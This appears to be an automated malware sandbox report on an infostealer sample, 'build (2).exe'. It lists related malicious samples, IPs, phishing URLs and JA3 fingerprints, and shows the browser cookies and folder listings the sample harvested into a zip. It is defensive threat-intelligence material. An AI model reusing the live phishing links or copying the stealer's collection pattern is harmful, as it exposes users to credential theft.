	a79qM8CfJQ.exe	Get hash	malicious	Browse	141.94.243.168
	VCynoOJ6ja.exe	Get hash	malicious	Browse	31.14.70.243
	twa0CmV2LZ.exe	Get hash	malicious	Browse	141.94.243.168
	67wgkOu8vG.exe	Get hash	malicious	Browse	31.14.70.250
	FortHack.exe	Get hash	malicious	Browse	141.94.243.168
	6F8D6E43D0D509A1223346B2F29E4E775384A4CB15A7AB1CF3AC702A772F73D7_noOVL.exe	Get hash	malicious	Browse	31.14.70.242
	v6aF6opW6c.exe	Get hash	malicious	Browse	31.14.70.243
	HammXffqQi.exe	Get hash	malicious	Browse	31.14.70.243
	Filmora.exe	Get hash	malicious	Browse	31.14.70.243
	jF6G4Ur9fw.exe	Get hash	malicious	Browse	141.95.206.174
	7ECCDD2DFBA647FAC22066819DC893C1CB467252A2381.exe	Get hash	malicious	Browse	31.14.70.243
	Roblox pet simulator autofarm installer.exe	Get hash	malicious	Browse	31.14.70.242
	conhost.exe	Get hash	malicious	Browse	31.14.70.242
	setup.exe	Get hash	malicious	Browse	31.14.70.242
	E9IOqND6ov.exe	Get hash	malicious	Browse	31.14.70.242
	RTvNR7IFh7.exe	Get hash	malicious	Browse	31.14.70.242
	https://gofile.io/d/db43dde5-24a5-4449-81dc-ee19b62d931d	Get hash	malicious	Browse	51.178.66.33
	https://cdn.discordapp.com/attachments/926917160364806166/957780798910644314/svhost.exe	Get hash	malicious	Browse	31.14.70.242
	bvOGvz01O9.exe	Get hash	malicious	Browse	51.210.156.12
ip-api.com	SpammerDS_V1.3.exe	Get hash	malicious	Browse	208.95.112.1
	Client-builts.exe	Get hash	malicious	Browse	208.95.112.1
	OliwciaPrivInstaller.exe	Get hash	malicious	Browse	208.95.112.1
	HackLoader.exe	Get hash	malicious	Browse	208.95.112.1
	Corrected documents.js	Get hash	malicious	Browse	208.95.112.1
	Statement.js	Get hash	malicious	Browse	208.95.112.1
	R8B8ktGtaP.exe	Get hash	malicious	Browse	208.95.112.1
	Install.exe	Get hash	malicious	Browse	208.95.112.1
	SifreliDosya.exe	Get hash	malicious	Browse	208.95.112.1
	MAGICD_1.exe.exe	Get hash	malicious	Browse	208.95.112.1
	O7G7uJC0QQ.exe	Get hash	malicious	Browse	208.95.112.1
	O7G7uJC0QQ.exe	Get hash	malicious	Browse	208.95.112.1
	DontPanic_1_2_3.exe	Get hash	malicious	Browse	208.95.112.1
	Scarlet Fire.mp3.exe.exe	Get hash	malicious	Browse	208.95.112.1
	q6lhRm7ga9.exe	Get hash	malicious	Browse	208.95.112.1
	A7JNp8nnof.exe	Get hash	malicious	Browse	208.95.112.1
	Lecture4.exe	Get hash	malicious	Browse	208.95.112.1
	92qI4u3y7j.exe	Get hash	malicious	Browse	208.95.112.1
	OieC6ysAgC.exe	Get hash	malicious	Browse	208.95.112.1
	OieC6ysAgC.exe	Get hash	malicious	Browse	208.95.112.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	https://center-customer.club/customer/system/account/signin-gsgstw4345gg433gfd3/?appgfdwet	Get hash	malicious	Browse	104.16.123.96
	https://cutt.ly/eKpAbZi	Get hash	malicious	Browse	104.16.123.96
	Vanced_Manager_v2.6.2_apkmody.io.apk	Get hash	malicious	Browse	104.21.234.28
	Vanced_Manager_v2.6.2_apkmody.io.apk	Get hash	malicious	Browse	172.67.219.198
	https://r20.rs6.net/tn.jsp?t=qcuzd54ab.0.0.sqy9yutab.0&1d=preview&r=3&p=https%3A%2F%2Fhywpcv.codesandbox.io/#Y3Jpc3RpbmEuZmlubGF5c29uQGxjcHMub3Jn	Get hash	malicious	Browse	104.18.47.230
	SublimeInstaller.exe	Get hash	malicious	Browse	104.21.38.184
	Catalog.exe	Get hash	malicious	Browse	172.67.169.37
	xUzydpDiBw.exe	Get hash	malicious	Browse	104.21.234.38
	Ziraat Bankasi Swift Mesaji.exe	Get hash	malicious	Browse	104.21.61.127
	ThXfhIdM2j.exe	Get hash	malicious	Browse	66.235.200.147
	https://wild-wave-1530.on.fleek.co/	Get hash	malicious	Browse	104.18.6.145
	2002871367_17.06.2022.html	Get hash	malicious	Browse	104.17.24.14
	https://adclick.g.doubleclick.net/pcs/click?xai=AKAOjsuNB9fkUnzdSKCMNvc7k4ilbQLDjtqYxh55Se5SIiE7_Sz6O4BVOpEyALQwilM3YNHJHFqkmqqT8ArqEyOG3nqoDnjG7dyxijqEYVK13iaLydptAurmS3iDTTmwXXbMlNXQFHUwi4AuxeX0VPkWveH8NbkWVaFMGGP3TE-UHQS10LQbw-wf4vbn1FxooWMKiGYhq9rssP9f9YWeyNmk3xFoLPQENaDU6Pw-zdqShPwUDZIzoYnNa2ZyfBwIKrQEmmArfN4N8-uR17f7Jxn4bbgswNCM91VbHOHvAVsqU3d1FfFTv-NRZzQoSIGHwkxnvHdKoH0EbQDwnW-WEERba2y190QSUoxnj6NEmiezvUgcVDHMHH1rUxHrtA0oX6FDFVy8oY5bcMpJpu4aCtI8qQ9IkWv709ifjzpA5CYkdV-umhViZcT_OmQMfjVWAaY75NIUSLhmCMWsCLrUqvddESnj3PaCtiAa2akzR3XNXRUXhDtzteOdNQdJIkPN8w0B2_-XsQ5IWjB5yewwqf0Eom3cUp8wZuiQnp19_YffgZEJEB_WkZfndO57-S62itG2ps_PaIn7WUqbO9_lWQmg5FAUWYKwXaHRs8u6qbJpt2dNb_Ll-eclk1rvVREJcKLIKYitTa9ZnXCgGldlcaNumqCtyw8P5RJHzV_ergpQ2LjRkvj9n3wyYzmmBtdiTkgUSbm2xBZA3or03jqbj2OUZ70xz9RsAx_1gDV0kvf-qGjFRJ1Q710fPCA7M5b_RnNcXq0AJ32kjgglnFxPQ0Gv8dCE5ECa7f7xcXq-2ytMWeTn17SthfLVtRDpNX6ckBfPzB8kQR68dgSd_1Lls3q7vnynHmuAs1ZQtMS181z-aOiOVWvRudDnMjjmmj0vRbms4Rs4SXNh8axZ1U7LeqsfU2gxkdIKh-MFyxr_esK3XLk5D6nVs3NZaJ5tb-aOy1r3-GejXCaRMbuAAAF-232Jtut7oBtNLQRzer7aKhBXwwARGXNDDaHLj0dvu_14NyG-159RIPlDhx_dDJwBzyg0uSWOaE_lUMQeaNvJXXAL-QAYSCRXlbn44MVIwz_k0-7T7ntrzNmWecmhlsI9JU63GpPiPNanT1fxD7QEX94fEAx7aduaUIh7T0CPVWRBv9pp6AdlKgX_su0_O_Mk_Rs&sai=AMfl-YTgmC8fWFlyDKmODFOhDlMLXZV2tObY33ijNiNvLvbmkQEagBRrkPF-04TIAUHFpbC0va0XuYy_zt2Jq59gSDIX1LKFWNIM0k_kO7QgBSEmPNvHUoP6YdBny_CCvCXusG1PRHOd0eVnY-RFWWqV87dpTjBUJ0ynQWPkDPW5&sig=Cg0ArKJSzMXHuNqM-G5z&pr=2:2.900839&fbs_aeid=comms@global.com&urlfix=1&nx=70&ny=208&dim=160x600&adurl=https://t.myvisualiq.net/click_pixel%3Fet%3Dc%26ago%3D212%26ao%3D546%26aca%3D26737887%26si%3D7192763%26ci%3D161117887%26pi%3D317760010%26ad%3D512366295%26sv1%3D%5Bkeyword_id%5D%26advt%3D4470646%26chnl%3D-7%26vndr%3D115%26sz%3D6585%26u%3Dred%3Dhttps://2005thhmgnnm2h3aak86s8ggvag7mkm1cu0bdn1dksrc7nimfv4g650.siasky.net#Y29tbXNAZ2xvYmFsLmNvbQ==	Get hash	malicious	Browse	104.21.234.213
	vbc (3).exe.exe	Get hash	malicious	Browse	104.21.27.240
	bis.exe.exe	Get hash	malicious	Browse	23.227.38.74
	https://linklock.titanhq.com/analyse?url=http%3A%2F%2F477Ws0Pob-d4775.laurakinneberg.com%2F%23.YmFmeWJlaWNhaWZqZ3ByeGp3ZXh0em5leGxybXR4bHBxY2VmMnpkaWN4bHVlYnFiZGRvenlocGpkbnUuaXBmcy5uZnRzdG9yYWdlLmxpbmsvI0RhdmUuRWRlbkAyc2ZnLmNvbQ%3D%3D&data=eJw9jE2PgjAARH8N3CQNhSUeetC44G5co0200Fu_FEJbEITQ_fXbcNjkHWaSNyPQRww4T1QGxCPbhhLF4-MZic6EBr027sKP-fUpoApHxAc2d0ECBLNMsqFzTJtGt6s8oAObVfQplfXG_8eE6ve7D-AuiHNPkmVkBJeOb6SPaaTZNLC2sVZxNayL1YNRZXKjyLdm5FwzQl8U7p0qekjLGiiTalUsjpc44cf9UsV382P71ru-33Vl84YWeFZWd6LoW25vEyv3Rrh0ohb_ymLrKiL1ySw9N-P8BXAtzW3CBGve7pyIqT2Z88yvATx4_gDRj2JZ	Get hash	malicious	Browse	188.114.97.3
	https://r20.rs6.net/tn.jsp?t=qcuzd54ab.0.0.sqy9yutab.0&1d=preview&r=3&p=https%3A%2F%2Fu2xyhg.codesandbox.io?dg=jonathan.durand@departement18.fr	Get hash	malicious	Browse	172.64.144.239
	Captura20223611.js	Get hash	malicious	Browse	172.67.190.105
	1.exe.exe	Get hash	malicious	Browse	104.21.17.150
	FDA HCM.xlsx	Get hash	malicious	Browse	23.227.38.74
TUT-ASUS	SpammerDS_V1.3.exe	Get hash	malicious	Browse	208.95.112.1
	Client-builts.exe	Get hash	malicious	Browse	208.95.112.1
	OliwciaPrivInstaller.exe	Get hash	malicious	Browse	208.95.112.1
	HackLoader.exe	Get hash	malicious	Browse	208.95.112.1
	Corrected documents.js	Get hash	malicious	Browse	208.95.112.1
	Statement.js	Get hash	malicious	Browse	208.95.112.1
	R8B8ktGtaP.exe	Get hash	malicious	Browse	208.95.112.1
	Install.exe	Get hash	malicious	Browse	208.95.112.1
	SifreliDosya.exe	Get hash	malicious	Browse	208.95.112.1
	MAGICD_1.exe.exe	Get hash	malicious	Browse	208.95.112.1
	O7G7uJC0QQ.exe	Get hash	malicious	Browse	208.95.112.1
	O7G7uJC0QQ.exe	Get hash	malicious	Browse	208.95.112.1
	VuY7nOScWR.exe	Get hash	malicious	Browse	208.95.112.1
	DontPanic_1_2_3.exe	Get hash	malicious	Browse	208.95.112.1
	Scarlet Fire.mp3.exe.exe	Get hash	malicious	Browse	208.95.112.1
	q6lhRm7ga9.exe	Get hash	malicious	Browse	208.95.112.1
	A7JNp8nnof.exe	Get hash	malicious	Browse	208.95.112.1
	Lecture4.exe	Get hash	malicious	Browse	208.95.112.1
	92qI4u3y7j.exe	Get hash	malicious	Browse	208.95.112.1
	OieC6ysAgC.exe	Get hash	malicious	Browse	208.95.112.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	TNT INVOICE TRACKING DETAILS.exe	Get hash	malicious	Browse	162.159.136.232 151.80.29.83
	xUzydpDiBw.exe	Get hash	malicious	Browse	162.159.136.232 151.80.29.83
	XInbW8Il6O.exe	Get hash	malicious	Browse	162.159.136.232 151.80.29.83
	https://wild-wave-1530.on.fleek.co/	Get hash	malicious	Browse	162.159.136.232 151.80.29.83
	2002871367_17.06.2022.html	Get hash	malicious	Browse	162.159.136.232 151.80.29.83
	SecuriteInfo.com.W32.AIDetectNet.01.18120.exe	Get hash	malicious	Browse	162.159.136.232 151.80.29.83
	Kzckpxc.exe.exe	Get hash	malicious	Browse	162.159.136.232 151.80.29.83
	build.exe	Get hash	malicious	Browse	162.159.136.232 151.80.29.83
	vbc (2).exe.exe	Get hash	malicious	Browse	162.159.136.232 151.80.29.83
	lista de pedidos y productos.pdf.exe	Get hash	malicious	Browse	162.159.136.232 151.80.29.83
	Document_PDF.exe	Get hash	malicious	Browse	162.159.136.232 151.80.29.83
	Document_PDF.exe	Get hash	malicious	Browse	162.159.136.232 151.80.29.83
	Invoice.exe	Get hash	malicious	Browse	162.159.136.232 151.80.29.83
	SecuriteInfo.com.W32.AIDetectNet.01.12105.exe	Get hash	malicious	Browse	162.159.136.232 151.80.29.83
	SecuriteInfo.com.W32.AIDetectNet.01.4738.exe	Get hash	malicious	Browse	162.159.136.232 151.80.29.83
	checker.exe	Get hash	malicious	Browse	162.159.136.232 151.80.29.83
	Ntjvbvus.exe	Get hash	malicious	Browse	162.159.136.232 151.80.29.83
	Ckiocrq.exe	Get hash	malicious	Browse	162.159.136.232 151.80.29.83
	oka.exe	Get hash	malicious	Browse	162.159.136.232 151.80.29.83
	Purchase ORDER 20TH.exe	Get hash	malicious	Browse	162.159.136.232 151.80.29.83

Process:	C:\Users\user\Desktop\build (2).exe
File Type:	Zip archive data, at least v2.0 to extract
Category:	dropped
Size (bytes):	138211
Entropy (8bit):	7.910711909480599
Encrypted:	false
SSDEEP:	3072:I+B+4L26tIbhA7O9x0SZurBW5Reo5tf12MUUPQvd141I9hWUdGcSSi25GPv:IKnv+39ZKW50Mf1BU1H4SXWUdGcLgPv
MD5:	1BE46195DCD18EEB0B96FC6CF2C8566B
SHA1:	9455D1CF4EA2508914DC4C183116F5C22D42137A
SHA-256:	C0A5948E5CFBDC2B57804ECEB23B416401A04B64352600C716C1B5069A233CE2
SHA-512:	DFD61481E54048DFE949A824729EC45FD567A7B6B452B8159B4C9002162FD27B00A8A176D27099C103D58974C6DC5F07F33745A8D763518576D2DC6245F4665C
Malicious:	false
Reputation:	low
Preview:	PK.........v.T..............$.Browsers/.. ............Xm......Xm....(.Wm...PK........4v.T..............$.Browsers/Google/.. ...........#`m.....#`m......Xm...PK........4v.T..-..........$.Browsers/Google/Cookies.txt.. .........:w%`m...:w%`m.....#`m....;....!.%....Z....!n...>D.8.6..G).m[sBed{.C.Z..N.Sr....B...t5!4...O....F....~.......u$<...z..Lj....q.r.l.B.hG.o+.._....l.....s.9.F....4.p...`..#..N'...B.WDu?.........q...b.]...#>.!DCR%.l.(_...).M..2r...0F..PK........7v.T..............$.Directories/.. ...........1cm.....1cm......Ym...PK......../v.T.n`.....^.....$.Directories/Desktop.txt.. ...........&Zm.....&Zm......Zm..........:"..1]......>....a.w.f...LW...M..{K..Q4.....>:.....z(...HR......2$...s=RNQ<SJ.Y..t([.)\.`H.Vo...@IO.S.0.x..ZD...w3.a..K8I.E..gb.c..x..Sa.....j..\|......v.......mu..........l..K.......,........9..I%..Za.#S...~i9.....u.;u.......,.2.>..:..^.9E.C..../!.7.!Z.}..~....PK........0v.T..............$.Directories/Documents.txt.. .........s..Zm...s..Zm..

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US.zip (copy)

Download File

Process:	C:\Users\user\Desktop\build (2).exe
File Type:	Zip archive data, at least v2.0 to extract
Category:	dropped
Size (bytes):	138211
Entropy (8bit):	7.910711909480599
Encrypted:	false
SSDEEP:	3072:I+B+4L26tIbhA7O9x0SZurBW5Reo5tf12MUUPQvd141I9hWUdGcSSi25GPv:IKnv+39ZKW50Mf1BU1H4SXWUdGcLgPv
MD5:	1BE46195DCD18EEB0B96FC6CF2C8566B
SHA1:	9455D1CF4EA2508914DC4C183116F5C22D42137A
SHA-256:	C0A5948E5CFBDC2B57804ECEB23B416401A04B64352600C716C1B5069A233CE2
SHA-512:	DFD61481E54048DFE949A824729EC45FD567A7B6B452B8159B4C9002162FD27B00A8A176D27099C103D58974C6DC5F07F33745A8D763518576D2DC6245F4665C
Malicious:	false
Preview:	PK.........v.T..............$.Browsers/.. ............Xm......Xm....(.Wm...PK........4v.T..............$.Browsers/Google/.. ...........#`m.....#`m......Xm...PK........4v.T..-..........$.Browsers/Google/Cookies.txt.. .........:w%`m...:w%`m.....#`m....;....!.%....Z....!n...>D.8.6..G).m[sBed{.C.Z..N.Sr....B...t5!4...O....F....~.......u$<...z..Lj....q.r.l.B.hG.o+.._....l.....s.9.F....4.p...`..#..N'...B.WDu?.........q...b.]...#>.!DCR%.l.(_...).M..2r...0F..PK........7v.T..............$.Directories/.. ...........1cm.....1cm......Ym...PK......../v.T.n`.....^.....$.Directories/Desktop.txt.. ...........&Zm.....&Zm......Zm..........:"..1]......>....a.w.f...LW...M..{K..Q4.....>:.....z(...HR......2$...s=RNQ<SJ.Y..t([.)\.`H.Vo...@IO.S.0.x..ZD...w3.a..K8I.E..gb.c..x..Sa.....j..\|......v.......mu..........l..K.......,........9..I%..Za.#S...~i9.....u.;u.......,.2.>..:..^.9E.C..../!.7.!Z.}..~....PK........0v.T..............$.Directories/Documents.txt.. .........s..Zm...s..Zm..

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Browsers\Google\Cookies.txt

Download File

Process:	C:\Users\user\Desktop\build (2).exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	224
Entropy (8bit):	5.793251994358385
Encrypted:	false
SSDEEP:	6:Pk3rqWwNXUEbhTqKxUNHdHZ2HmwhZZZHwFnAVnn:c7toUwsb9HZ2pHRtn
MD5:	D9DBCC56C259A9BB9C14D81579A3CA21
SHA1:	AEA5970F87BB495E05AAD919B03B6CC6A154AD03
SHA-256:	731E41D8C3DAFA2D161BF8D1E818D99E69C9D0981A4EFDC4E7CEF6126A0C2E31
SHA-512:	EE9A56AC29E5BDAB0492569C14D043F3005A161D73B31F71C61D1FE210ADDBBF1CFB7331C5150E0F6C2A6D4DEA6774CA6786DC1081C7FFC383B80993206405C5
Malicious:	false
Preview:	.google.com.TRUE./.FALSE.13261735795164740.NID.204=TAJoBZJmGymg7hmIhx3Pl2B_ihALX0aygaD3k_6aC7ZxEK7XXCNSCdw1ngcPD2GKb8blK9BMvnrjIC7LQudAB_6nqtij7uM-AmmmXBhTbFN20087xdr3Z7uOpVj33C0KRQne2C-F8m9XNwnFH3I5zkA8uxAkwvE0BSBiqum7_78..

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Directories\Desktop.txt

Download File

Process:	C:\Users\user\Desktop\build (2).exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	606
Entropy (8bit):	5.413941874544846
Encrypted:	false
SSDEEP:	12:wv1y1osJ000MLCeqX0M72cPNBlysNVwLKR+zW00zoOl2BVuklyseqc6d:/oUp0MTqXX2cP7lysNVn60zoOl2BQkl9
MD5:	5D5E98B21ABB8653A7CCE7AA0242ECEE
SHA1:	10DDE398A2E3DC04E363BFEA725711635BA69822
SHA-256:	913EFE904A48FB0048370BE249EF2AE92C57DD692FB1598DA60D587BBFCD0D8D
SHA-512:	33E0FE08327452F0E7A429BD7AE78AF654B3AA9C39C352F3D1210F7C2AC1A3A5EB2C99BE671468D766B13E7899D873DF8CF911E4957CFAAC895B9FB7B96B62A2
Malicious:	false
Preview:	Desktop\...BNAGMGSPLO\...EEGWXUHVUG\...GAOBCVIQIJ\...MXPXCVPDVN\....GAOBCVIQIJ.jpg....IPKGELNTQY.xlsx....LSBIHQFDVT.pdf....MXPXCVPDVN.docx....QCFWYSKMHA.png....SUAVTZKNFL.mp3...UOOJJOZIRH\....IPKGELNTQY.jpg....LSBIHQFDVT.mp3....MXPXCVPDVN.xlsx....NEBFQQYWPS.png....SFPUSAFIOL.pdf....UOOJJOZIRH.docx...ZQIXMVQGAH\...build (2).exe...desktop.ini...Excel 2016.lnk...GAOBCVIQIJ.jpg...IPKGELNTQY.jpg...IPKGELNTQY.xlsx...LSBIHQFDVT.mp3...LSBIHQFDVT.pdf...Microsoft Edge.lnk...MXPXCVPDVN.docx...MXPXCVPDVN.xlsx...NEBFQQYWPS.png...QCFWYSKMHA.png...SFPUSAFIOL.pdf...SUAVTZKNFL.mp3...UOOJJOZIRH.docx...Word 2016.lnk..

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Directories\Documents.txt

Download File

Process:	C:\Users\user\Desktop\build (2).exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	655
Entropy (8bit):	5.364660309862265
Encrypted:	false
SSDEEP:	12:my1osJ000MLCGOPLKQ4wRLKBLKMkLKu0M72cPNBlysNhLKG+zW007l2BVuklyseW:doUp0MLfxrEEuX2cP7lysNkx07l2BQkR
MD5:	82AC412F0D6D64BD29DCB8254D9344FC
SHA1:	C38A1C2F4FB922FF2C9DA3F3DB76F80F783A18FF
SHA-256:	A4335ECC99BE306AF59CFC54DD7B00B1461B86CB227918314681D7C552F363FA
SHA-512:	134C0FCDD396C666380EDB5A3C28DC58E2F076A823D1AEC77C515740A22CAB70B88AAB92813DF177B2CC584E94AB5A006490CA0C7263D14129089E2FFABB3CE1
Malicious:	false
Preview:	Documents\...BNAGMGSPLO\...EEGWXUHVUG\...GAOBCVIQIJ\...MXPXCVPDVN\....GAOBCVIQIJ.jpg....IPKGELNTQY.xlsx....LSBIHQFDVT.pdf....MXPXCVPDVN.docx....QCFWYSKMHA.png....SUAVTZKNFL.mp3...My Music\....desktop.ini...My Pictures\....Camera Roll\.....desktop.ini....desktop.ini...My Videos\....desktop.ini...UOOJJOZIRH\....IPKGELNTQY.jpg....LSBIHQFDVT.mp3....MXPXCVPDVN.xlsx....NEBFQQYWPS.png....SFPUSAFIOL.pdf....UOOJJOZIRH.docx...ZQIXMVQGAH\...desktop.ini...GAOBCVIQIJ.jpg...IPKGELNTQY.jpg...IPKGELNTQY.xlsx...LSBIHQFDVT.mp3...LSBIHQFDVT.pdf...MXPXCVPDVN.docx...MXPXCVPDVN.xlsx...NEBFQQYWPS.png...QCFWYSKMHA.png...SFPUSAFIOL.pdf...SUAVTZKNFL.mp3...UOOJJOZIRH.docx..

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Directories\Downloads.txt

Download File

Process:	C:\Users\user\Desktop\build (2).exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	234
Entropy (8bit):	5.30772945745048
Encrypted:	false
SSDEEP:	6:3tSLKRR2jqZXst0Xt000g3QgfQ2BnVl+JkX1ys5gqNOy:QLKG+zW007l2BVuklyseqcy
MD5:	4410E0775FB91C477166F0A5119A7593
SHA1:	05B7A23B7406E30D4F223CDECF0F0B4588A7D98E
SHA-256:	B19C3B4A1C8AD2195BF4FA4CD66B3683B00A38A3A03672353908D35D83A59063
SHA-512:	712075283C9AD5FFA93E5E4FFD85459B1A1302A9972EA23DB2D7FB8C71EC33845BB16B21F2D3E3F899D6DC27F790EDA03B8FBAEA2B7CD3857EBA6601BB4D6BDB
Malicious:	false
Preview:	Downloads\...desktop.ini...GAOBCVIQIJ.jpg...IPKGELNTQY.jpg...IPKGELNTQY.xlsx...LSBIHQFDVT.mp3...LSBIHQFDVT.pdf...MXPXCVPDVN.docx...MXPXCVPDVN.xlsx...NEBFQQYWPS.png...QCFWYSKMHA.png...SFPUSAFIOL.pdf...SUAVTZKNFL.mp3...UOOJJOZIRH.docx..

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Directories\OneDrive.txt

Download File

Process:	C:\Users\user\Desktop\build (2).exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	11
Entropy (8bit):	3.2776134368191165
Encrypted:	false
SSDEEP:	3:1hiRn:14Rn
MD5:	1DA31A8EA979A8627E1C0630291B5B26
SHA1:	903725300CBC8EEBD49847428F00AB6C20729D67
SHA-256:	55FE800A4DA9F2E2A8C3EF6D768302B0CAC54DC55587812976CA493C276BAE30
SHA-512:	220484AD810BA043CEB3C918E0472AA0F3A35D7F04C2BF8ADA31109012C2FDAA083A2ACD4AE20207608B83D54CDF0D4F077FF9B8027A6786E65548F8834E7AC6
Malicious:	false
Preview:	OneDrive\..

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Directories\Pictures.txt

Download File

Process:	C:\Users\user\Desktop\build (2).exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.401826932053255
Encrypted:	false
SSDEEP:	3:YzIVqIPLKKrLKB:nqyLKCLKB
MD5:	154A3A46F2AC154FD11B51AE37F7BFB0
SHA1:	5FF354343773ACBFB8973DF4B0D96FAFA5842668
SHA-256:	BCF4D37446D020F5B6214E9896E607C7BDAFA7C118C0C3DC766211EC63AB841A
SHA-512:	12CADFFFA2F45B77D48F30FE8C63E9FC5FF7712CD9C2AF275052722D5640DD4E7AE2D9C3D07328833438295CB63EB6F4A37CB82623453618E00B4F23A95618BC
Malicious:	false
Preview:	Pictures\...Camera Roll\....desktop.ini...desktop.ini..

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Directories\Startup.txt

Download File

Process:	C:\Users\user\Desktop\build (2).exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	24
Entropy (8bit):	4.053508854797679
Encrypted:	false
SSDEEP:	3:jgBLKB:j4LKB
MD5:	68C93DA4981D591704CEA7B71CEBFB97
SHA1:	FD0F8D97463CD33892CC828B4AD04E03FC014FA6
SHA-256:	889ED51F9C16A4B989BDA57957D3E132B1A9C117EE84E208207F2FA208A59483
SHA-512:	63455C726B55F2D4DE87147A75FF04F2DAA35278183969CCF185D23707840DD84363BEC20D4E8C56252196CE555001CA0E61B3F4887D27577081FDEF9E946402
Malicious:	false
Preview:	Startup\...desktop.ini..

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Directories\Temp.txt

Download File

Process:	C:\Users\user\Desktop\build (2).exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1765
Entropy (8bit):	4.666171291820719
Encrypted:	false
SSDEEP:	48:43fajlGUoFs29Q1fb102WjVvwz4ULX6m4zXsX51XHXiLQkGVt0WrBptBA:4ij0ub1fb17WVwRLKm4z83Xm3GVtRrBW
MD5:	9DCDAF69F832803FFEA0FB3CFA71CEFB
SHA1:	B9E1E5E09A7F101AA8C1A299ED68802EBDA58D3D
SHA-256:	CD1B93C30245B5BABD2F7BF7CC29E2D9BD0EE869186A2FF9057A97C5D4D8674B
SHA-512:	8374E53445664550D8C72DEDC39BA4DAC1F61882B2AC334B8A976E2EE6EC8BB5F72A25D81484611176E1572BDCEA3108132D31B70F7C9E84D59804C797FCD8B3
Malicious:	false
Preview:	Temp\...acrocef_low\...acrord32_sbx\...CR_94EB1.tmp\....setup.exe...Low\....JavaDeployReg.log...qvu1z0ke.pei\....unarchiver.log...0164771190...0196354653...0353475199...0409654664...0450125302...0518291756...0653671941...0666563528...0982390758...1033868256...1141274626...1206337459...1237160943...1239919175...1244065654...1287572840...1343496627...1422339599...1927994670...2103954313...2118371548...2129360816...2160417493...2162403398...2168651637...2265332024...2265465471...2385760553...2567238426...2585558601...2669049752...2760101248...2843307863...2849925037...3024948866...3050907755...3322604653...3476888679...3643399760...3677062445...3761760476...4054640694...4478492829...4676012234...4683256203...4736274156...4941266003...4965367024...5064077962...5281104033...5491630718...5622580005...5713452101...5809130301...5859486270...6092905029...6109303877...6183211589...6213653276...6329227256...6332783370...6422942404...6483516391...6577738837...6636805992...6730030605...6750529025..

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Directories\Videos.txt

Download File

Process:	C:\Users\user\Desktop\build (2).exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.7950885863977324
Encrypted:	false
SSDEEP:	3:k+JrLKB:k+JrLKB
MD5:	1FDDBF1169B6C75898B86E7E24BC7C1F
SHA1:	D2091060CB5191FF70EB99C0088C182E80C20F8C
SHA-256:	A67AA329B7D878DE61671E18CD2F4B011D11CBAC67EA779818C6DAFAD2D70733
SHA-512:	20BFEAFDE7FEC1753FEF59DE467BD4A3DD7FE627E8C44E95FE62B065A5768C4508E886EC5D898E911A28CF6365F455C9AB1EBE2386D17A76F53037F99061FD4D
Malicious:	false
Preview:	Videos\...desktop.ini..

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Grabber\DRIVE-C\Users\user\Desktop\GAOBCVIQIJ.jpg

Download File

Process:	C:\Users\user\Desktop\build (2).exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701188456968639
Encrypted:	false
SSDEEP:	24:hm3LKgBsTCBI602KGM6Fnd0F02s0LTz4+A7wXBjb9gPY14fmfdBH159l7TZzRQTJ:4mg9IFPGM6OtPc++wXBbV14e71zwv
MD5:	18A3248DC9C539CCD2C8419D200F1C4D
SHA1:	3B2CEE87F3426C4A08959E9861D274663420215C
SHA-256:	27D6BAB3FFA19534FF008BDBC5FF07BE94BA08C909222D5AD4802C4C9E10153E
SHA-512:	F8176C814016D4962693A55A84D2BCC26EE01DE822E76B3D3A6B0ADD48382F8D76B5576742BBCAD16A7779C602B435150C0EBDDE1B1ECBFFD6702ECEFE87133B
Malicious:	false
